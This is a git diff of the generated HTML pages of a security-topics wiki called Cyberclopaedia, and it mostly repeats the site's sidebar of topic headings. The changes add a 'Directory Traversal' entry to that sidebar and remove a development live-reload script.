        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -247,22 +247,6 @@

Compari - - diff --git a/docs/Networking/Protocols/Network Time Protocol (NTP).html b/docs/Networking/Protocols/Network Time Protocol (NTP).html index d12a52ee..3521244e 100644 --- a/docs/Networking/Protocols/Network Time Protocol (NTP).html +++ b/docs/Networking/Protocols/Network Time Protocol (NTP).html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -193,22 +193,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Networking/Protocols/Server Message Block (SMB).html b/docs/Networking/Protocols/Server Message Block (SMB).html index 6c64b62f..c882fa57 100644 --- a/docs/Networking/Protocols/Server Message Block (SMB).html +++ b/docs/Networking/Protocols/Server Message Block (SMB).html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
